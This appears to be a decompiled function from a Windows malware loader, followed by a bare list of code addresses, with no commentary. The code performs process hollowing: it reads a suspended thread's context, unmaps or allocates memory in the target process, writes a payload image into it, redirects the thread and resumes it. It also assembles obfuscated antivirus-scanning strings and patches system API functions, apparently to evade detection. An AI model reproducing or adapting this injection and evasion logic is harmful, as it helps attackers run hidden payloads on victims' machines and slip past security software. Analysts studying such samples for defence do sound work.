				char _v896;
				intOrPtr _v900;
				char _v904;
				char _v908;
				char _v912;
				intOrPtr _v916;
				char _v920;
				char _v924;
				char _v928;
				intOrPtr _v932;
				char _v936;
				char _v940;
				char _v944;
				intOrPtr _v948;
				char _v952;
				char _v956;
				char _v960;
				intOrPtr _v964;
				char _v968;
				char _v972;
				char _v976;
				intOrPtr _v980;
				char _v984;
				char _v988;
				char _v992;
				intOrPtr _v996;
				char _v1000;
				char _v1004;
				char _v1008;
				intOrPtr _v1012;
				char _v1016;
				char _v1020;
				char _v1024;
				intOrPtr _v1028;
				char _v1032;
				char _v1036;
				char _v1040;
				intOrPtr _v1044;
				char _v1048;
				char _v1052;
				short* _t604;
				intOrPtr _t617;
				intOrPtr* _t620;
				intOrPtr _t734;
				void* _t819;
				int _t820;
				intOrPtr _t877;
				void* _t879;
				intOrPtr _t881;
				long _t883;
				intOrPtr _t884;
				void* _t886;
				intOrPtr _t946;
				long _t962;
				void* _t963;
				void* _t964;
				intOrPtr _t1036;
				void* _t1038;
				intOrPtr _t1110;
				intOrPtr _t1112;
				void* _t1169;
				void* _t1199;
				void* _t1288;
				void* _t1290;
				void* _t1292;
				void* _t1294;
				void* _t1296;
				void* _t1298;
				void* _t1300;
				intOrPtr _t1386;
				intOrPtr _t1387;
				intOrPtr _t1389;
				intOrPtr _t1433;
				intOrPtr _t1535;
				void* _t1537;
				long _t1539;
				void* _t1540;
				long _t1542;
				void* _t1543;
				void* _t1561;
				void* _t1645;
				void* _t1650;
				void* _t1655;
				void* _t1660;
				intOrPtr _t1661;
				void* _t1699;
				void* _t1704;
				signed int _t1705;
				void* _t1711;
				void* _t1716;
				void* _t1721;
				void* _t1726;
				void* _t1731;
				void* _t1736;
				void* _t1741;
				void* _t1746;
				void* _t1751;
				void* _t1756;
				void* _t1761;
				void* _t1766;
				void* _t1771;
				void* _t1776;
				void* _t1781;
				void* _t1786;
				void* _t1791;
				void* _t1796;
				void* _t1801;
				void* _t1806;
				void* _t1811;
				void* _t1816;
				void* _t1821;
				void* _t1826;
				void* _t1831;
				void* _t1836;
				void* _t1841;
				void* _t1846;
				void* _t1851;
				void* _t1856;
				void* _t1861;
				void* _t1866;
				void* _t1871;
				void* _t1877;
				void* _t1882;
				void* _t1887;
				void* _t1892;
				void* _t1904;
				void* _t1909;
				void* _t1914;
				void* _t1919;
				void* _t1924;
				void* _t1929;
				void _t1930;
				void _t1932;
				void* _t1937;
				void* _t1942;
				void* _t1947;
				intOrPtr _t1949;
				void* _t1954;
				void* _t1959;
				void* _t1964;
				void* _t1969;
				void* _t1974;
				void* _t1979;
				void* _t1984;
				intOrPtr _t1994;
				void* _t1995;
				intOrPtr _t1997;
				intOrPtr _t1998;
				void* _t2006;
				void* _t2009;
				void* _t2013;

				_t2013 = __fp0;
				_t1997 = _t1998;
				_t1561 = 0x83;
				do {
					_push(0);
					_push(0);
					_t1561 = _t1561 - 1;
					_t2001 = _t1561;
				} while (_t1561 != 0);
				_t1994 = __edx;
				_v8 = __eax;
				E03264954(_v8);
				_push(_t1997);
				_push(0x3279f25);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1998;
				E032644F4(0x329e35c, 0x3279f40);
				_push(0x3279f4c);
				_push( *0x329e35c);
				_push("OpenSession");
				E03264824();
				E03264698( &_v12, E03264964(_v16));
				_push(_v12);
				E032647B0( &_v24,  *0x329e35c, 0x3279f4c);
				E03264698( &_v20, E03264964(_v24));
				_pop(_t1645);
				E03277C04(_v20,  *0x329e35c, _t1645, _t2001);
				_push(0x3279f4c);
				_push( *0x329e35c);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v28, E03264964(_v32));
				_push(_v28);
				E032647B0( &_v40,  *0x329e35c, 0x3279f4c);
				E03264698( &_v36, E03264964(_v40));
				_pop(_t1650);
				E03277C04(_v36,  *0x329e35c, _t1650, _t2001);
				_push(0x3279f4c);
				_push( *0x329e35c);
				_push("Initialize");
				E03264824();
				E03264698( &_v44, E03264964(_v48));
				_push(_v44);
				E032647B0( &_v56,  *0x329e35c, 0x3279f4c);
				E03264698( &_v52, E03264964(_v56));
				_pop(_t1655);
				E03277C04(_v52,  *0x329e35c, _t1655, _t2001);
				_push(0x3279f4c);
				_push( *0x329e35c);
				_push("OpenSession");
				E03264824();
				E03264698( &_v60, E03264964(_v64));
				_push(_v60);
				E032647B0( &_v72,  *0x329e35c, 0x3279f4c);
				E03264698( &_v68, E03264964(_v72));
				_pop(_t1660);
				E03277C04(_v68,  *0x329e35c, _t1660, _t2001);
				 *0x329e4a4 = _t1994;
				_t604 =  *0x329e4a4; // 0x0
				if( *_t604 == 0x5a4d) {
					_push(0);
					_push(_t1994);
					_t617 =  *0x329e4a4; // 0x0
					asm("cdq");
					asm("adc edx, [esp+0x4]");
					 *0x329e4a8 =  *((intOrPtr*)(_t617 + 0x3c)) + _v92;
					_t620 =  *0x329e4a8; // 0x0
					if( *_t620 == 0x4550) {
						_push(0x3279f4c);
						_push( *0x329e35c);
						_push("UacInitialize");
						E03264824();
						E03264698( &_v176, E03264964(_v180));
						_push(_v176);
						E032647B0( &_v188,  *0x329e35c, 0x3279f4c);
						E03264698( &_v184, E03264964(_v188));
						_pop(_t1699);
						E03277C04(_v184,  *0x329e35c, _t1699, _t2004);
						_push(0x3279f4c);
						_push( *0x329e35c);
						_push("OpenSession");
						E03264824();
						E03264698( &_v192, E03264964(_v196));
						_push(_v192);
						E032647B0( &_v204,  *0x329e35c, 0x3279f4c);
						E03264698( &_v200, E03264964(_v204));
						_pop(_t1704);
						E03277C04(_v200,  *0x329e35c, _t1704, _t2004);
						E03262EE0();
						 *0x329e4c4 = (E03262F08(9) + 1) * 0x5f5e100;
						_t734 =  *0x329e4a8; // 0x0
						_t1705 =  *0x329e4c4; // 0x0
						 *0x329e4c0 = _t1705 -  *((intOrPtr*)(_t734 + 0x50));
						_push(0x3279f4c);
						_push( *0x329e35c);
						_push("UacInitialize");
						E03264824();
						E03264698( &_v208, E03264964(_v212));
						_push(_v208);
						E032647B0( &_v220,  *0x329e35c, 0x3279f4c);
						E03264698( &_v216, E03264964(_v220));
						_pop(_t1711);
						E03277C04(_v216,  *0x329e35c, _t1711, _t2004);
						_push(0x3279f4c);
						_push( *0x329e35c);
						_push("ScanString");
						E03264824();
						E03264698( &_v224, E03264964(_v228));
						_push(_v224);
						E032647B0( &_v236,  *0x329e35c, 0x3279f4c);
						E03264698( &_v232, E03264964(_v236));
						_pop(_t1716);
						E03277C04(_v232,  *0x329e35c, _t1716, _t2004);
						0x329e3d8->ContextFlags = 0x10007;
						_push(0x3279f4c);
						_push( *0x329e35c);
						_push("UacInitialize");
						E03264824();
						E03264698( &_v240, E03264964(_v244));
						_push(_v240);
						E032647B0( &_v252,  *0x329e35c, 0x3279f4c);
						E03264698( &_v248, E03264964(_v252));
						_pop(_t1721);
						E03277C04(_v248,  *0x329e35c, _t1721, _t2004);
						_push(0x3279f4c);
						_push( *0x329e35c);
						_push("UacScan");
						E03264824();
						E03264698( &_v256, E03264964(_v260));
						_push(_v256);
						E032647B0( &_v268,  *0x329e35c, 0x3279f4c);
						E03264698( &_v264, E03264964(_v268));
						_pop(_t1726);
						E03277C04(_v264,  *0x329e35c, _t1726, _t2004);
						_push(0x3279f4c);
						_push( *0x329e35c);
						_push("Initialize");
						E03264824();
						E03264698( &_v272, E03264964(_v276));
						_push(_v272);
						E032647B0( &_v284,  *0x329e35c, 0x3279f4c);
						E03264698( &_v280, E03264964(_v284));
						_pop(_t1731);
						E03277C04(_v280,  *0x329e35c, _t1731, _t2004);
						_push(0x3279f4c);
						_push( *0x329e35c);
						_push("ScanString");
						E03264824();
						E03264698( &_v288, E03264964(_v292));
						_push(_v288);
						E032647B0( &_v300,  *0x329e35c, 0x3279f4c);
						E03264698( &_v296, E03264964(_v300));
						_pop(_t1736);
						E03277C04(_v296,  *0x329e35c, _t1736, _t2004);
						_t819 =  *0x329e388; // 0x0
						_t820 = GetThreadContext(_t819, 0x329e3d8);
						_t2005 = _t820;
						if(_t820 != 0) {
							_push(0x3279f4c);
							_push( *0x329e35c);
							_push("UacInitialize");
							E03264824();
							E03264698( &_v304, E03264964(_v308));
							_push(_v304);
							E032647B0( &_v316,  *0x329e35c, 0x3279f4c);
							E03264698( &_v312, E03264964(_v316));
							_pop(_t1741);
							E03277C04(_v312,  *0x329e35c, _t1741, _t2005);
							_push(0x3279f4c);
							_push( *0x329e35c);
							_push("UacScan");
							E03264824();
							E03264698( &_v320, E03264964(_v324));
							_push(_v320);
							E032647B0( &_v332,  *0x329e35c, 0x3279f4c);
							E03264698( &_v328, E03264964(_v332));
							_pop(_t1746);
							E03277C04(_v328,  *0x329e35c, _t1746, _t2005);
							_push(0x3279f4c);
							_push( *0x329e35c);
							_push("Initialize");
							E03264824();
							E03264698( &_v336, E03264964(_v340));
							_push(_v336);
							E032647B0( &_v348,  *0x329e35c, 0x3279f4c);
							E03264698( &_v344, E03264964(_v348));
							_pop(_t1751);
							E03277C04(_v344,  *0x329e35c, _t1751, _t2005);
							_push(0x3279f4c);
							_push( *0x329e35c);
							_push("ScanString");
							E03264824();
							E03264698( &_v352, E03264964(_v356));
							_push(_v352);
							E032647B0( &_v364,  *0x329e35c, 0x3279f4c);
							E03264698( &_v360, E03264964(_v364));
							_pop(_t1756);
							E03277C04(_v360,  *0x329e35c, _t1756, _t2005);
							_t877 =  *0x329e47c; // 0x0
							_t879 =  *0x329e384; // 0x0
							NtReadVirtualMemory(_t879, _t877 + 8, 0x329e4ac, 4, 0x329e4b4);
							_t881 =  *0x329e4a8; // 0x0
							_t2006 =  *((intOrPtr*)(_t881 + 0x34)) -  *0x329e4ac; // 0x0
							if(_t2006 != 0) {
								_t883 =  *0x329e4c0; // 0x0
								_t884 =  *0x329e4a8; // 0x0
								_t886 =  *0x329e384; // 0x0
								 *0x329e4b0 = E032779BC(_t886,  *((intOrPtr*)(_t884 + 0x34)), _t883, 0x3000, 0x40);
							} else {
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("UacInitialize");
								E03264824();
								E03264698( &_v368, E03264964(_v372));
								_push(_v368);
								E032647B0( &_v380,  *0x329e35c, 0x3279f4c);
								E03264698( &_v376, E03264964(_v380));
								_pop(_t1969);
								E03277C04(_v376,  *0x329e35c, _t1969, _t2006);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("UacScan");
								E03264824();
								E03264698( &_v384, E03264964(_v388));
								_push(_v384);
								E032647B0( &_v396,  *0x329e35c, 0x3279f4c);
								E03264698( &_v392, E03264964(_v396));
								_pop(_t1974);
								E03277C04(_v392,  *0x329e35c, _t1974, _t2006);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("Initialize");
								E03264824();
								E03264698( &_v400, E03264964(_v404));
								_push(_v400);
								E032647B0( &_v412,  *0x329e35c, 0x3279f4c);
								E03264698( &_v408, E03264964(_v412));
								_pop(_t1979);
								E03277C04(_v408,  *0x329e35c, _t1979, _t2006);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanString");
								E03264824();
								E03264698( &_v416, E03264964(_v420));
								_push(_v416);
								E032647B0( &_v428,  *0x329e35c, 0x3279f4c);
								E03264698( &_v424, E03264964(_v428));
								_pop(_t1984);
								E03277C04(_v424,  *0x329e35c, _t1984, _t2006);
								_t1535 =  *0x329e4a8; // 0x0
								_t1537 =  *0x329e384; // 0x0
								if(NtUnmapViewOfSection(_t1537,  *(_t1535 + 0x34)) != 0) {
									_t1539 =  *0x329e4c0; // 0x0
									_t1540 =  *0x329e384; // 0x0
									 *0x329e4b0 = E032779BC(_t1540, 0, _t1539, 0x3000, 0x40);
								} else {
									_t1542 =  *0x329e4c0; // 0x0
									_t1543 =  *0x329e384; // 0x0
									 *0x329e4b0 = E032779BC(_t1543, 0, _t1542, 0x3000, 0x40);
								}
							}
							_t2008 =  *0x329e4b0;
							if( *0x329e4b0 != 0) {
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("UacInitialize");
								E03264824();
								E03264698( &_v432, E03264964(_v436));
								_push(_v432);
								E032647B0( &_v444,  *0x329e35c, 0x3279f4c);
								E03264698( &_v440, E03264964(_v444));
								_pop(_t1761);
								E03277C04(_v440,  *0x329e35c, _t1761, _t2008);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("UacScan");
								E03264824();
								E03264698( &_v448, E03264964(_v452));
								_push(_v448);
								E032647B0( &_v460,  *0x329e35c, 0x3279f4c);
								E03264698( &_v456, E03264964(_v460));
								_pop(_t1766);
								E03277C04(_v456,  *0x329e35c, _t1766, _t2008);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("Initialize");
								E03264824();
								E03264698( &_v464, E03264964(_v468));
								_push(_v464);
								E032647B0( &_v476,  *0x329e35c, 0x3279f4c);
								E03264698( &_v472, E03264964(_v476));
								_pop(_t1771);
								E03277C04(_v472,  *0x329e35c, _t1771, _t2008);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanString");
								E03264824();
								E03264698( &_v480, E03264964(_v484));
								_push(_v480);
								E032647B0( &_v492,  *0x329e35c, 0x3279f4c);
								E03264698( &_v488, E03264964(_v492));
								_pop(_t1776);
								E03277C04(_v488,  *0x329e35c, _t1776, _t2008);
								_t1995 = E03277E64(_t1994, _t2013);
								_t946 =  *0x329e4a8; // 0x0
								_t2009 =  *((intOrPtr*)(_t946 + 0x34)) -  *0x329e4b0; // 0x0
								if(_t2009 != 0) {
									_push(0x3279f4c);
									_push( *0x329e35c);
									_push("UacInitialize");
									E03264824();
									E03264698( &_v496, E03264964(_v500));
									_push(_v496);
									E032647B0( &_v508,  *0x329e35c, 0x3279f4c);
									E03264698( &_v504, E03264964(_v508));
									_pop(_t1914);
									E03277C04(_v504,  *0x329e35c, _t1914, _t2009);
									_push(0x3279f4c);
									_push( *0x329e35c);
									_push("UacScan");
									E03264824();
									E03264698( &_v512, E03264964(_v516));
									_push(_v512);
									E032647B0( &_v524,  *0x329e35c, 0x3279f4c);
									E03264698( &_v520, E03264964(_v524));
									_pop(_t1919);
									E03277C04(_v520,  *0x329e35c, _t1919, _t2009);
									_push(0x3279f4c);
									_push( *0x329e35c);
									_push("Initialize");
									E03264824();
									E03264698( &_v528, E03264964(_v532));
									_push(_v528);
									E032647B0( &_v540,  *0x329e35c, 0x3279f4c);
									E03264698( &_v536, E03264964(_v540));
									_pop(_t1924);
									E03277C04(_v536,  *0x329e35c, _t1924, _t2009);
									_push(0x3279f4c);
									_push( *0x329e35c);
									_push("ScanString");
									E03264824();
									E03264698( &_v544, E03264964(_v548));
									_push(_v544);
									E032647B0( &_v556,  *0x329e35c, 0x3279f4c);
									E03264698( &_v552, E03264964(_v556));
									_pop(_t1929);
									E03277C04(_v552,  *0x329e35c, _t1929, _t2009);
									_t1386 =  *0x329e4a8; // 0x0
									_t1930 =  *0x329e4b0; // 0x0
									_t1387 =  *0x329e4a8; // 0x0
									E03277D5C(_t2013, _t1995, _t1387, _t1930 -  *((intOrPtr*)(_t1386 + 0x34)));
									_t1389 =  *0x329e4a8; // 0x0
									_t1932 =  *0x329e4b0; // 0x0
									 *(_t1389 + 0x34) = _t1932;
									_push(0x3279f4c);
									_push( *0x329e35c);
									_push("UacInitialize");
									E03264824();
									E03264698( &_v560, E03264964(_v564));
									_push(_v560);
									E032647B0( &_v572,  *0x329e35c, 0x3279f4c);
									E03264698( &_v568, E03264964(_v572));
									_pop(_t1937);
									E03277C04(_v568,  *0x329e35c, _t1937, _t2009);
									_push(0x3279f4c);
									_push( *0x329e35c);
									_push("OpenSession");
									E03264824();
									E03264698( &_v576, E03264964(_v580));
									_push(_v576);
									E032647B0( &_v588,  *0x329e35c, 0x3279f4c);
									E03264698( &_v584, E03264964(_v588));
									_pop(_t1942);
									E03277C04(_v584,  *0x329e35c, _t1942, _t2009);
									_push(0x3279f4c);
									_push( *0x329e35c);
									_push("ScanBuffer");
									E03264824();
									E03264698( &_v592, E03264964(_v596));
									_push(_v592);
									E032647B0( &_v604,  *0x329e35c, 0x3279f4c);
									E03264698( &_v600, E03264964(_v604));
									_pop(_t1947);
									E03277C04(_v600,  *0x329e35c, _t1947, _t2009);
									_push(0);
									_push(_t1995);
									_t1433 =  *0x329e4a4; // 0x0
									asm("cdq");
									_t2010 =  *((intOrPtr*)(_t1433 + 0x3c)) + _v456;
									asm("adc edx, [esp+0x4]");
									_t1949 =  *0x329e4a8; // 0x0
									E03277D50( *((intOrPtr*)(_t1433 + 0x3c)) + _v456, 0xf8, _t1949);
									_push(0x3279f4c);
									_push( *0x329e35c);
									_push("ScanBuffer");
									E03264824();
									E03264698( &_v608, E03264964(_v612));
									_push(_v608);
									E032647B0( &_v620,  *0x329e35c, 0x3279f4c);
									E03264698( &_v616, E03264964(_v620));
									_pop(_t1954);
									E03277C04(_v616,  *0x329e35c, _t1954,  *((intOrPtr*)(_t1433 + 0x3c)) + _v456);
									_push(0x3279f4c);
									_push( *0x329e35c);
									_push("UacInitialize");
									E03264824();
									E03264698( &_v624, E03264964(_v628));
									_push(_v624);
									E032647B0( &_v636,  *0x329e35c, 0x3279f4c);
									E03264698( &_v632, E03264964(_v636));
									_pop(_t1959);
									E03277C04(_v632,  *0x329e35c, _t1959,  *((intOrPtr*)(_t1433 + 0x3c)) + _v456);
									_push(0x3279f4c);
									_push( *0x329e35c);
									_push("OpenSession");
									E03264824();
									E03264698( &_v640, E03264964(_v644));
									_push(_v640);
									E032647B0( &_v652,  *0x329e35c, 0x3279f4c);
									E03264698( &_v648, E03264964(_v652));
									_pop(_t1964);
									E03277C04(_v648,  *0x329e35c, _t1964,  *((intOrPtr*)(_t1433 + 0x3c)) + _v456);
								}
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanString");
								E03264824();
								E03264698( &_v656, E03264964(_v660));
								_push(_v656);
								E032647B0( &_v668,  *0x329e35c, 0x3279f4c);
								E03264698( &_v664, E03264964(_v668));
								_pop(_t1781);
								E03277C04(_v664,  *0x329e35c, _t1781, _t2010);
								_t962 =  *0x329e4c0; // 0x0
								_t963 =  *0x329e4b0; // 0x0
								_t964 =  *0x329e384; // 0x0
								NtWriteVirtualMemory(_t964, _t963, _t1995, _t962, 0x329e4b4);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("UacInitialize");
								E03264824();
								E03264698( &_v672, E03264964(_v676));
								_push(_v672);
								E032647B0( &_v684,  *0x329e35c, 0x3279f4c);
								E03264698( &_v680, E03264964(_v684));
								_pop(_t1786);
								E03277C04(_v680,  *0x329e35c, _t1786, _t2010);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanString");
								E03264824();
								E03264698( &_v688, E03264964(_v692));
								_push(_v688);
								E032647B0( &_v700,  *0x329e35c, 0x3279f4c);
								E03264698( &_v696, E03264964(_v700));
								_pop(_t1791);
								E03277C04(_v696,  *0x329e35c, _t1791, _t2010);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("OpenSession");
								E03264824();
								E03264698( &_v704, E03264964(_v708));
								_push(_v704);
								E032647B0( &_v716,  *0x329e35c, 0x3279f4c);
								E03264698( &_v712, E03264964(_v716));
								_pop(_t1796);
								E03277C04(_v712,  *0x329e35c, _t1796, _t2010);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("UacInitialize");
								E03264824();
								E03264698( &_v720, E03264964(_v724));
								_push(_v720);
								E032647B0( &_v732,  *0x329e35c, 0x3279f4c);
								E03264698( &_v728, E03264964(_v732));
								_pop(_t1801);
								E03277C04(_v728,  *0x329e35c, _t1801, _t2010);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v736, E03264964(_v740));
								_push(_v736);
								E032647B0( &_v748,  *0x329e35c, 0x3279f4c);
								E03264698( &_v744, E03264964(_v748));
								_pop(_t1806);
								E03277C04(_v744,  *0x329e35c, _t1806, _t2010);
								_t1036 =  *0x329e47c; // 0x0
								_t1038 =  *0x329e384; // 0x0
								NtWriteVirtualMemory(_t1038, _t1036 + 8, 0x329e4b0, 4, 0x329e4b4);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("UacInitialize");
								E03264824();
								E03264698( &_v752, E03264964(_v756));
								_push(_v752);
								E032647B0( &_v764,  *0x329e35c, 0x3279f4c);
								E03264698( &_v760, E03264964(_v764));
								_pop(_t1811);
								E03277C04(_v760,  *0x329e35c, _t1811, _t2010);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanString");
								E03264824();
								E03264698( &_v768, E03264964(_v772));
								_push(_v768);
								E032647B0( &_v780,  *0x329e35c, 0x3279f4c);
								E03264698( &_v776, E03264964(_v780));
								_pop(_t1816);
								E03277C04(_v776,  *0x329e35c, _t1816, _t2010);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("OpenSession");
								E03264824();
								E03264698( &_v784, E03264964(_v788));
								_push(_v784);
								E032647B0( &_v796,  *0x329e35c, 0x3279f4c);
								E03264698( &_v792, E03264964(_v796));
								_pop(_t1821);
								E03277C04(_v792,  *0x329e35c, _t1821, _t2010);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("UacInitialize");
								E03264824();
								E03264698( &_v800, E03264964(_v804));
								_push(_v800);
								E032647B0( &_v812,  *0x329e35c, 0x3279f4c);
								E03264698( &_v808, E03264964(_v812));
								_pop(_t1826);
								E03277C04(_v808,  *0x329e35c, _t1826, _t2010);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v816, E03264964(_v820));
								_push(_v816);
								E032647B0( &_v828,  *0x329e35c, 0x3279f4c);
								E03264698( &_v824, E03264964(_v828));
								_pop(_t1831);
								E03277C04(_v824,  *0x329e35c, _t1831, _t2010);
								_t1110 =  *0x329e4a8; // 0x0
								_t1112 =  *((intOrPtr*)(_t1110 + 0x28)) +  *0x329e4b0;
								_t2011 = _t1112;
								 *0x329e488 = _t1112;
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("UacInitialize");
								E03264824();
								E03264698( &_v832, E03264964(_v836));
								_push(_v832);
								E032647B0( &_v844,  *0x329e35c, 0x3279f4c);
								E03264698( &_v840, E03264964(_v844));
								_pop(_t1836);
								E03277C04(_v840,  *0x329e35c, _t1836, _t1112);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("UacInitialize");
								E03264824();
								E03264698( &_v848, E03264964(_v852));
								_push(_v848);
								E032647B0( &_v860,  *0x329e35c, 0x3279f4c);
								E03264698( &_v856, E03264964(_v860));
								_pop(_t1841);
								E03277C04(_v856,  *0x329e35c, _t1841, _t1112);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v864, E03264964(_v868));
								_push(_v864);
								E032647B0( &_v876,  *0x329e35c, 0x3279f4c);
								E03264698( &_v872, E03264964(_v876));
								_pop(_t1846);
								E03277C04(_v872,  *0x329e35c, _t1846, _t1112);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("OpenSession");
								E03264824();
								E03264698( &_v880, E03264964(_v884));
								_push(_v880);
								E032647B0( &_v892,  *0x329e35c, 0x3279f4c);
								E03264698( &_v888, E03264964(_v892));
								_pop(_t1851);
								E03277C04(_v888,  *0x329e35c, _t1851, _t2011);
								_t1169 =  *0x329e388; // 0x0
								SetThreadContext(_t1169, 0x329e3d8);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("OpenSession");
								E03264824();
								E03264698( &_v896, E03264964(_v900));
								_push(_v896);
								E032647B0( &_v908,  *0x329e35c, 0x3279f4c);
								E03264698( &_v904, E03264964(_v908));
								_pop(_t1856);
								E03277C04(_v904,  *0x329e35c, _t1856, _t2011);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v912, E03264964(_v916));
								_push(_v912);
								E032647B0( &_v924,  *0x329e35c, 0x3279f4c);
								E03264698( &_v920, E03264964(_v924));
								_pop(_t1861);
								E03277C04(_v920,  *0x329e35c, _t1861, _t2011);
								_t1199 =  *0x329e388; // 0x0
								NtResumeThread(_t1199, 0);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanString");
								E03264824();
								E03264698( &_v928, E03264964(_v932));
								_push(_v928);
								E032647B0( &_v940,  *0x329e35c, 0x3279f4c);
								E03264698( &_v936, E03264964(_v940));
								_pop(_t1866);
								E03277C04(_v936,  *0x329e35c, _t1866, _t2011);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("OpenSession");
								E03264824();
								E03264698( &_v944, E03264964(_v948));
								_push(_v944);
								E032647B0( &_v956,  *0x329e35c, 0x3279f4c);
								E03264698( &_v952, E03264964(_v956));
								_pop(_t1871);
								E03277C04(_v952,  *0x329e35c, _t1871, _t2011);
								E03262C2C(_t1995);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("OpenSession");
								E03264824();
								E03264698( &_v960, E03264964(_v964));
								_push(_v960);
								E032647B0( &_v972,  *0x329e35c, 0x3279f4c);
								E03264698( &_v968, E03264964(_v972));
								_pop(_t1877);
								E03277C04(_v968,  *0x329e35c, _t1877, _t2011);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v976, E03264964(_v980));
								_push(_v976);
								E032647B0( &_v988,  *0x329e35c, 0x3279f4c);
								E03264698( &_v984, E03264964(_v988));
								_pop(_t1882);
								E03277C04(_v984,  *0x329e35c, _t1882, _t2011);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("OpenSession");
								E03264824();
								E03264698( &_v992, E03264964(_v996));
								_push(_v992);
								E032647B0( &_v1004,  *0x329e35c, 0x3279f4c);
								E03264698( &_v1000, E03264964(_v1004));
								_pop(_t1887);
								E03277C04(_v1000,  *0x329e35c, _t1887, _t2011);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanString");
								E03264824();
								E03264698( &_v1008, E03264964(_v1012));
								_push(_v1008);
								E032647B0( &_v1020,  *0x329e35c, 0x3279f4c);
								E03264698( &_v1016, E03264964(_v1020));
								_pop(_t1892);
								E03277C04(_v1016,  *0x329e35c, _t1892, _t2011);
								_t1288 =  *0x329e384; // 0x0
								E03277B14(_t1288, "BCryptVerifySignature");
								_t1290 =  *0x329e384; // 0x0
								E03277B14(_t1290, "BCryptQueryProviderRegistration");
								_t1292 =  *0x329e384; // 0x0
								E03277B14(_t1292, "BCryptRegisterProvider");
								_t1294 =  *0x329e384; // 0x0
								E03277B14(_t1294, "NtReadVirtualMemory");
								_t1296 =  *0x329e384; // 0x0
								E03277B14(_t1296, "NtOpenObjectAuditAlarm");
								_t1298 =  *0x329e384; // 0x0
								E03277B14(_t1298, "I_QueryTagInformation");
								_t1300 =  *0x329e384; // 0x0
								E03277B14(_t1300, "NtSetSecurityObject");
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v1024, E03264964(_v1028));
								_push(_v1024);
								E032647B0( &_v1036,  *0x329e35c, 0x3279f4c);
								E03264698( &_v1032, E03264964(_v1036));
								_pop(_t1904);
								E03277C04(_v1032,  *0x329e35c, _t1904, _t2011);
								_push(0x3279f4c);
								_push( *0x329e35c);
								_push("OpenSession");
								E03264824();
								E03264698( &_v1040, E03264964(_v1044));
								_push(_v1040);
								E032647B0( &_v1052,  *0x329e35c, 0x3279f4c);
								E03264698( &_v1048, E03264964(_v1052));
								_pop(_t1909);
								E03277C04(_v1048,  *0x329e35c, _t1909, _t2011);
							}
						}
					}
				}
				_pop(_t1661);
				 *[fs:eax] = _t1661;
				_push(0x3279f2c);
				E032644C4( &_v1052, 0x64);
				E032644C4( &_v652, 0x64);
				E032644C4( &_v252, 0x18);
				E03264C24( &_v156);
				return E032644C4( &_v152, 0x25);
			}

0x03277f54
0x03277f55
0x03277f57
0x03277f5c
0x03277f5c
0x03277f5e
0x03277f60
0x03277f60
0x03277f60
0x03277f66
0x03277f68
0x03277f6e
0x03277f7a
0x03277f7b
0x03277f80
0x03277f83
0x03277f8d
0x03277f92
0x03277f97
0x03277f99
0x03277fa6
0x03277fb8
0x03277fc0
0x03277fcb
0x03277fdd
0x03277fe5
0x03277fe6
0x03277feb
0x03277ff0
0x03277ff2
0x03277fff
0x03278011
0x03278019
0x03278024
0x03278036
0x0327803e
0x0327803f
0x03278044
0x03278049
0x0327804b
0x03278058
0x0327806a
0x03278072
0x0327807d
0x0327808f
0x03278097
0x03278098
0x0327809d
0x032780a2
0x032780a4
0x032780b1
0x032780c3
0x032780cb
0x032780d6
0x032780e8
0x032780f0
0x032780f1
0x032780f8
0x032780fe
0x03278108
0x03278112
0x03278113
0x03278114
0x0327811c
0x03278120
0x03278127
0x0327812c
0x03278137
0x032783f6
0x032783fb
0x032783fd
0x0327840d
0x03278425
0x03278430
0x0327843e
0x03278456
0x03278461
0x03278462
0x03278467
0x0327846c
0x0327846e
0x0327847e
0x03278496
0x032784a1
0x032784af
0x032784c7
0x032784d2
0x032784d3
0x032784d8
0x032784ee
0x032784f3
0x032784f8
0x03278501
0x03278507
0x0327850c
0x0327850e
0x0327851e
0x03278536
0x03278541
0x0327854f
0x03278567
0x03278572
0x03278573
0x03278578
0x0327857d
0x0327857f
0x0327858f
0x032785a7
0x032785b2
0x032785c0
0x032785d8
0x032785e3
0x032785e4
0x032785e9
0x032785f3
0x032785f8
0x032785fa
0x0327860a
0x03278622
0x0327862d
0x0327863b
0x03278653
0x0327865e
0x0327865f
0x03278664
0x03278669
0x0327866b
0x0327867b
0x03278693
0x0327869e
0x032786ac
0x032786c4
0x032786cf
0x032786d0
0x032786d5
0x032786da
0x032786dc
0x032786ec
0x03278704
0x0327870f
0x0327871d
0x03278735
0x03278740
